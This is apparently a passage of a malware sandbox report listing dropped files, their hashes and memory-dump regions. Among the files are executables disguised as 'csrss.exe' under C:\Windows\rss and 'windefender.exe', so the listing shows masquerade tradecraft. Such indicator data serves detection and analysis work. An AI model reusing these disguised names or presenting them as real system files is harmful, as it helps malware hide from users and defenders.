2ada5337207458d58b19fd487a126995b6136ffb

SHA256
ce1271b3bfe87192814d3ae208db5d18861e6d0f2c562be4313d098e1f2fc8ce

SHA512
4052ab7dc7a1dff2a4dbd57d2a43c7617f4b251d02c029160589aa6726a528f497919848900f7328fced269478dac30d33bfcf9cb42f8b28c4829eca9daf5580

Download Submit
C:\Users\Admin\Pictures\wvBxMPduWHJ4Iw6qjNH8q1WU.exe

Filesize
84KB

MD5
4516372b38681ec2493e2b3bf1bddd6c

SHA1
1ba4e89a2cf43dc738ed952b5920ba12674a4529

SHA256
0e24ef98ba2278e948fc622eb2a8a8bd8c86f2219e2931b16059773b3aa5ce42

SHA512
b1c76500a924029af46ba3513f0a072a50898cf647b0aa547f6721026e5b69a6ee8e3bf33eb6311396c5ce98d90ce1b41bd52189fbd002a2524dd429827d63ff

Download Submit
C:\Users\Admin\Pictures\wvBxMPduWHJ4Iw6qjNH8q1WU.exe

Filesize
46KB

MD5
190051ae9a3bc898485efe4030e59b79

SHA1
26c9ba71066dec702c5d05561160abe1c1be711c

SHA256
c16e72df0c64ede3243b240075e9b76366a82f9cd21ca4487ba03384927cf05a

SHA512
0cc77d7ebf03f3890c8b769a54c019bbc2ee4a1efa2754ba68b5dad5a54f083328bb8bad4b1f1bc1f7f581e82be153fa1c619d88b1c83bf1f7e7645f6f9eda57

Download Submit
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
3d086a433708053f9bf9523e1d87a4e8

SHA1
b3ab5d4f282a4c8fe8c3005b8a557ed5a0e37f28

SHA256
6f8fd1b8d9788ad54eaeee329232187e24b7b43393a01aeba2d6e9675231fb69

SHA512
931ae42b4c68a4507ff2342332b08eb407050d47cf4176137ea022d0f6e513c689e998445a04c6d18d4877391705c586bfce0234632b898d41aaed0957996dfd

Download Submit
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
19KB

MD5
bfeb3066632bdd44377ffa9cf84e6d56

SHA1
b390ecec641ec3a4f0e3befb32d337729276f79c

SHA256
4942c28cfb0152ee4119665957e01cc508405fbf75ae38e5b37fb321dab8a554

SHA512
16888ae8b6b527055783bf77b13375d591762984805c89205bafec15dc325a9f9fa4edd0b26252a79593e525d36718817deb0d034e6f7fe46db30d262cc76a97

Download Submit
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
19KB

MD5
62587302015d581a46c944f0dc53288d

SHA1
7192ef561f9f1d5acc09b328d286ac6e2667bf4d

SHA256
c25b5abff5e63e48888fb93a0003d5b0b75670b9d51401e7e358f1da5ad19f86

SHA512
6af2120265f38115cd8d77717c489ac056d3ba5635f433d57b174dbda25d0cc02da1cc528323615b73aa7c29b1d74428ba00663f8c25cbbba36741bc1e7dad41

Download Submit
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
19KB

MD5
7d83844998ae44406dc2d126fb1c137c

SHA1
749bd485e7b5322967c8aea6240880f1011da417

SHA256
7b5247746a7251a6586ccc2fa800714b77a4b5e806b2980d776ea516a903e8b1

SHA512
da5764cc9b0e35fa1d5bbea8bbf17a8660269369a604a6bf5990020363f25c480aae9154348a7dddd7df945f7c018daa7d6f071cca7d25bc38cceaf5461e7547

Download Submit
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
19KB

MD5
5b8b9cd68132beaa3ff0b179e142a079

SHA1
273b8df6a38ca5e2616db7e8738779fc5e67598a

SHA256
a064437bc6b470b222c6863c73c39dbf83ef500a2c208331bfc5fb974aba9c71

SHA512
5e35476ecbf28e53a5453366045ea66909758f9fbdb0877f30153c8ceefbe6529f8bb105278218d0a982b3e8bdeaa6cdc7ce67009f25a6d1cb4310f7baa2c761

Download Submit
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
19KB

MD5
34b4ceef15267db4cccbcf5f4d489984

SHA1
3733c8196ead61f2d5c6f4b3d6a14fac6e0378ed

SHA256
db169a091ec229f2cf52d004e1c9a980ba1d89bcafb0e4f8c24c26813730c750

SHA512
9957a1cb98b716bc4b0c39d3522f0ca3652c60fdbe588c2e98c2f2a3d1c412948e70504ce437cef895de4c9911ebc1d58898aa7b453b9a9dce3499c4e0502628

Download Submit
C:\Windows\Temp\YYFeagcQEOcPvCau\tKpADNrKyKjYycp\whtBcZm.exe

Filesize
188KB

MD5
d621350c15a7a58d8a9ac49ea92833ff

SHA1
e65b048b9ce696f39b63df04f2566eff61c65f52

SHA256
8183d2817e9cb0734d604a059a8fc703213ee2c97f1b746f2ebf59660b95142b

SHA512
4803c597bd54b2db16218a83d193a18090ffb48d653b599739e17407c2445c4676d10c03a3d71655fd2a0a6c1eef79ca078af6140abc41781f460be2f041950e

Download Submit
C:\Windows\rss\csrss.exe

Filesize
161KB

MD5
c799be8349c43742999fb0c93b9b9d04

SHA1
45baf3cea8cfaa2d609c092e78dbf0a13d6ba594

SHA256
cdc4b8e126ac02b4cd843e0ba3068079e49d25ad682f01eed1620792aca95c99

SHA512
2b5650ed90e8613d591afd4a01aee7d4717512aef8efe9495899cfd7ac7babb630ac2d3ac2aad21a8035ac3145b849d29f6b6c599961cfda73ee99769b573965

Download Submit
C:\Windows\rss\csrss.exe

Filesize
39KB

MD5
11df167d07a740dcddf952c6c42eff18

SHA1
594cd8ae65000dcf3da796647592e450feedc7ee

SHA256
fd3898ea262fbaa541e275cd351b7dd1cac23638d19041f8158dc5d223dab4aa

SHA512
b8b82139d90215c07d38f9ee5b29382109891284cfd52dd4b64fd5ae62f65b4a59dabae411be0a56feefb2360c76ae9f5c30fc708f04b35247b597f4b0fe7721

Download Submit
C:\Windows\windefender.exe

Filesize
13KB

MD5
32bb349b60d4222381e73eec193a87ce

SHA1
d71bb5fc1748b2480dd3826478d4b4fc36a1f8d5

SHA256
b212490381b9a13a12f79b4f367270e445d7422af071ffe8d9dbe00c9bc2d47c

SHA512
f1fec5572a8b9fe11d565b054adc707265a9a4cd615bbb572e111a42673eddd536b07589283c81357c260069aa4b1df7dd36d6511de820a8e2899f25144c89b8

Download Submit
C:\Windows\windefender.exe

Filesize
33KB

MD5
56f1136f1969bb686fbddbea168503d9

SHA1
2e0be8a9eaa5e2f5fff1e4daafb004f93822268e

SHA256
393624cf2f1f9ef3918be9dcf03bb9c29baedbd744603786aada0dc45fec0f8b

SHA512
3d2c908e056e37f520ce105df341f5543309b779856775bc6ef33169ff67b3e3a3cb1303ad5e3674243e74e616b0689883f3e2577cff558cbdd24af30709391a

Download Submit
memory/344-61-0x00007FF6E5080000-0x00007FF6E50E6000-memory.dmp

Filesize
408KB

Download
memory/524-260-0x0000000000400000-0x0000000000D1C000-memory.dmp

Filesize
9.1MB

Download
memory/524-256-0x0000000002A00000-0x0000000002E02000-memory.dmp

Filesize
4.0MB

Download
memory/524-558-0x0000000000400000-0x0000000000D1C000-memory.dmp

Filesize
9.1MB

Download
memory/1364-240-0x0000000007960000-0x000000000797A000-memory.dmp

Filesize
104KB

Download
memory/1364-250-0x00000000744F0000-0x0000000074CA0000-memory.dmp

Filesize
7.7MB

Download
memory/1364-131-0x0000000004D80000-0x0000000004D90000-memory.dmp

Filesize
64KB

Download
memory/1364-209-0x000000007F650000-0x000000007F660000-memory.dmp

Filesize
64KB

Download
memory/1364-128-0x00000000744F0000-0x0000000074CA0000-memory.dmp

Filesize
7.7MB

Download
memory/1364-236-0x0000000007920000-0x0000000007934000-memory.dmp

Filesize
80KB

Download
memory/1364-207-0x000000006F200000-0x000000006F24C000-memory.dmp

Filesize
304KB

Download
memory/1364-208-0x000000006F250000-0x000000006F5A4000-memory.dmp

Filesize
3.3MB

Download
memory/1364-234-0x00000000078C0000-0x00000000078D1000-memory.dmp

Filesize
68KB

Download
memory/1364-219-0x0000000004D80000-0x0000000004D90000-memory.dmp

Filesize
64KB

Download
memory/2088-707-0x0000000000400000-0x00000000008E2000-memory.dmp

Filesize
4.9MB

Download
memory/2088-150-0x00000000027A0000-0x00000000027A1000-memory.dmp

Filesize
4KB

Download
memory/2088-475-0x0000000000400000-0x00000000008E2000-memory.dmp

Filesize
4.9MB

Download
memory/2156-258-0x0000000000400000-0x0000000000D1C000-memory.dmp

Filesize
9.1MB

Download
memory/2156-205-0x0000000002B60000-0x0000000002F68000-memory.dmp

Filesize
4.0MB

Download
memory/2156-225-0x0000000000400000-0x0000000000D1C000-memory.dmp

Filesize
9.1MB

Download
memory/2156-74-0x0000000002B60000-0x0000000002F68000-memory.dmp

Filesize
4.0MB

Download
memory/2156-75-0x0000000002F70000-0x000000000385B000-memory.dmp

Filesize
8.9MB

Download
memory/2156-86-0x0000000000400000-0x0000000000D1C000-memory.dmp

Filesize
9.1MB

Download
memory/3036-100-0x00000000744F0000-0x0000000074CA0000-memory.dmp

Filesize
7.7MB

Download
memory/3036-129-0x0000000005E30000-0x0000000005E7C000-memory.dmp

Filesize
304KB

Download
memory/3036-101-0x00000000050E0000-0x0000000005708000-memory.dmp

Filesize
6.2MB

Download
memory/3036-222-0x0000000004B60000-0x0000000004B6A000-memory.dmp

Filesize
40KB

Download
memory/3036-105-0x0000000004DC0000-0x0000000004DE2000-memory.dmp

Filesize
136KB

Download
memory/3036-251-0x00000000744F0000-0x0000000074CA0000-memory.dmp

Filesize
7.7MB

Download
memory/3036-191-0x000000006F200000-0x000000006F24C000-memory.dmp

Filesize
304KB

Download
memory/3036-106-0x0000000002A50000-0x0000000002A60000-memory.dmp

Filesize
64KB

Download
memory/3036-241-0x0000000007510000-0x0000000007518000-memory.dmp

Filesize
32KB

Download
memory/3036-187-0x00000000072F0000-0x0000000007322000-memory.dmp

Filesize
200KB

Download
memory/3036-117-0x0000000005880000-0x00000000058E6000-memory.dmp

Filesize
408KB

Download
memory/3036-119-0x00000000058F0000-0x0000000005C44000-memory.dmp

Filesize
3.3MB

Download
memory/3036-235-0x00000000074D0000-0x00000000074DE000-memory.dmp

Filesize
56KB

Download
memory/3036-228-0x00000000744F0000-0x0000000074CA0000-memory.dmp

Filesize
7.7MB

Download
memory/3036-120-0x0000000005D80000-0x0000000005D9E000-memory.dmp

Filesize
120KB

Download
memory/3036-112-0x0000000005060000-0x00000000050C6000-memory.dmp

Filesize
408KB

Download
memory/3036-227-0x0000000007530000-0x00000000075C6000-memory.dmp

Filesize
600KB

Download
memory/3036-206-0x0000000007350000-0x00000000073F3000-memory.dmp

Filesize
652KB

Download
memory/3036-204-0x0000000007330000-0x000000000734E000-memory.dmp

Filesize
120KB

Download
memory/3036-194-0x000000006F250000-0x000000006F5A4000-memory.dmp

Filesize
3.3MB

Download
memory/3036-103-0x0000000002A50000-0x0000000002A60000-memory.dmp

Filesize
64KB

Download
memory/3036-98-0x0000000002440000-0x0000000002476000-memory.dmp

Filesize
216KB

Download
memory/3036-151-0x00000000061A0000-0x00000000061E4000-memory.dmp

Filesize
272KB

Download
memory/3036-158-0x00000000070C0000-0x00000000070DA000-memory.dmp

Filesize
104KB

Download
memory/3036-157-0x0000000007820000-0x0000000007E9A000-memory.dmp

Filesize
6.5MB

Download
memory/3036-152-0x0000000007120000-0x0000000007196000-memory.dmp

Filesize
472KB

Download
memory/3100-190-0x0000000005010000-0x0000000005020000-memory.dmp

Filesize
64KB

Download
memory/3100-16-0x0000000000400000-0x0000000000408000-memory.dmp

Filesize
32KB

Download
memory/3100-17-0x00000000744F0000-0x0000000074CA0000-memory.dmp

Filesize
7.7MB

Download
memory/3100-180-0x00000000744F0000-0x0000000074CA0000-memory.dmp

Filesize
7.7MB

Download
memory/3100-18-0x0000000005010000-0x0000000005020000-memory.dmp

Filesize
64KB

Download
memory/3316-5-0x00000242087E0000-0x0000024208802000-memory.dmp

Filesize
136KB

Download
memory/3316-12-0x0000024206DF0000-0x0000024206E00000-memory.dmp

Filesize
64KB

Download
memory/3316-11-0x0000024206DF0000-0x0000024206E00000-memory.dmp

Filesize
64KB

Download
memory/3316-10-0x00007FFEE97F0000-0x00007FFEEA2B1000-memory.dmp

Filesize
10.8MB

Download
memory/3316-15-0x00007FFEE97F0000-0x00007FFEEA2B1000-memory.dmp

Filesize
10.8MB

Download
memory/4284-183-0x0000000000820000-0x0000000000920000-memory.dmp

Filesize
1024KB

Download
memory/4284-188-0x0000000000400000-0x000000000062E000-memory.dmp

Filesize
2.2MB

Download
memory/4284-719-0x0000000000400000-0x000000000062E000-memory.dmp

Filesize
2.2MB

Download
memory/4284-524-0x0000000000400000-0x000000000062E000-memory.dmp

Filesize
2.2MB

Download
memory/4284-445-0x0000000061E00000-0x0000000061EF3000-memory.dmp

Filesize
972KB

Download
memory/4284-781-0x0000000000400000-0x000000000062E000-memory.dmp

Filesize
2.2MB

Download
memory/4284-184-0x00000000006B0000-0x00000000006CC000-memory.dmp

Filesize
112KB

Download
memory/4400-232-0x0000000000760000-0x0000000000E0F000-memory.dmp

Filesize
6.7MB

Download
memory/4400-226-0x0000000010000000-0x0000000010574000-memory.dmp

Filesize
5.5MB

Download
memory/4500-371-0x0000000000A70000-0x0000000000F58000-memory.dmp

Filesize
4.9MB

Download
memory/4516-230-0x0000000002AA0000-0x0000000002E9C000-memory.dmp

Filesize
4.0MB

Download
memory/4516-104-0x0000000002EA0000-0x000000000378B000-memory.dmp

Filesize
8.9MB

Download
memory/4516-259-0x0000000000400000-0x0000000000D1C000-memory.dmp

Filesize
9.1MB

Download
memory/4516-118-0x0000000000400000-0x0000000000D1C000-memory.dmp

Filesize
9.1MB

Download
memory/4516-102-0x0000000002AA0000-0x0000000002E9C000-memory.dmp

Filesize
4.0MB

Download
memory/5080-257-0x0000000002AB0000-0x0000000002EAA000-memory.dmp

Filesize
4.0MB

Download
memory/5080-271-0x0000000000400000-0x0000000000D1C000-memory.dmp

Filesize
9.1MB

Download
memory/5080-583-0x0000000000400000-0x0000000000D1C000-memory.dmp

Filesize
9.1MB

Download
memory/5200-806-0x0000000000400000-0x0000000000D1C000-memory.dmp

Filesize
9.1MB

Download
memory/5200-720-0x0000000000400000-0x0000000000D1C000-memory.dmp

Filesize
9.1MB

Download
memory/5200-820-0x0000000000400000-0x0000000000D1C000-memory.dmp

Filesize
9.1MB

Download
memory/5200-813-0x0000000000400000-0x0000000000D1C000-memory.dmp

Filesize
9.1MB

Download
memory/5648-826-0x0000000000400000-0x00000000008DF000-memory.dmp

Filesize
4.9MB

Download
memory/5648-811-0x0000000000400000-0x00000000008DF000-memory.dmp

Filesize
4.9MB

Download
memory/6084-758-0x0000000000400000-0x00000000008DF000-memory.dmp

Filesize
4.9MB

Download